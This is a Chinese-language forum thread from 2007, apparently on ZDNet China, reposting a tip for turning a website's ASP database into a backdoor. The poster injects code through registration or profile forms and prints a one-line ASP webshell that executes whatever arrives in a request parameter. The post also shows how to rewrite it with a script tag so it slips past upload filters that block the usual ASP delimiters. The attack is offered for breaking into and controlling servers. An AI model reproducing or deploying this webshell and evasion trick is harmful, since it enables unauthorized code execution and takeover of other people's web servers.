CNET中国旗舰网站
ZDNet China
|
CNET科技资讯网
|
政府采购
|
行业网站联盟
ZDNet China 至顶网是中国最大的企业级IT资源门户
首页
网络安全
存储
服务器
软件
桌面产品
开发
企业管理
白皮书
中小企业
新闻
下载
社区
企业网
无线网
过滤防护
安全管理
网络存储
磁带库/VTL
数据保护
光存储
X86服务器
虚拟化
小型机
操作系统
数据库
中间件
协作办公
手机
笔记本
数码相机
C/S开发
web开发
移动开发
web软件
应用软件
博客
论坛
搜索
搜索
高级搜索
用户登录
用户名:
密码:
登录
新用户注册
社区首页
未证实消息
桌面产品
软件
开发
网络与安全
服务器
存储
下载
苹果爱好者
中小企业
活动专区
病毒/木马
新知天下
CWEEK专属社区
悬赏问答
游客:
注册
|
登录
|
会员
|
搜索
|
论坛设施
|
帮助
ZDNetChina中文社区
»
.Net技术
» 插入ASP代码让网站数据库成为ASP木马
C++开发常用工具荟萃
深入理解C语言指针的奥秘
Vista系统解惑要考虑的10件事
Asp.Net 学习资源列表
J2ME与Web Service的罗曼史
中间件技术的思想、概念、分类
.Net开发人员十种必备工具
用JSP 2.0开发Web应用程序
草根挑战豪门PHPer要为自己正名
高手写的php+flash多人视频聊天室
PHP程序员的优化调试技术和技巧
PHP程序员的优化调试技术和技巧
‹‹ 上一主题
|
下一主题 ››
投票
交易
悬赏
活动
打印
|
推荐
|
订阅
|
收藏
标题:
[转贴]
插入ASP代码让网站数据库成为ASP木马
phplove
明星会员
UID 254169
精华
9
积分 23522
帖子 2044
威望 11186
ZD币 2982 元
阅读权限 230
注册 2007-10-10
状态 离线
楼主
使用道具
发表于 2007-10-21 13:00
资料
个人空间
短消息
加为好友
开发者在线
插入ASP代码让网站数据库成为ASP木马
很多时候,我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。
不过,在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
首先:原程序代码是:
〈%execute request("l")%〉
我们可以把它的标签换下来。
然后改成:
〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉
这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。
热点频道推荐:
C/S开发
|
数据库
|
WEB开发
|
嵌入式
|
项目管理
|
lycwu
白金会员
UID 252718
精华 0
积分 4338
帖子 314
威望 2020
ZD币 503 元
阅读权限 150
注册 2007-10-3
状态 离线
沙发
使用道具
发表于 2007-10-23 09:53
资料
个人空间
短消息
加为好友
一句话木马是吧?
热点频道推荐:
C/S开发
|
数据库
|
WEB开发
|
嵌入式
|
项目管理
|
投票
交易
悬赏
活动
控制面板首页
编辑个人资料
积分交易
公众用户组
好友列表
个人空间管理
开通个人空间
基本概况
流量统计
客户软件
发帖量记录
论坛排行
主题排行
发帖排行
积分排行
在线时间
管理团队
管理统计
问卷调查
当前时区 GMT+8, 现在时间是 2008-7-20 18:04
Powered by Discuz! 5.5.0 © 2001-2007 Comsenz Inc.
Processed in 0.055420 second(s), 7 queries
TOP
清除 Cookies
-
联系我们
-
ZDNetChina中文社区
-
无图版
-
WAP
论坛设施
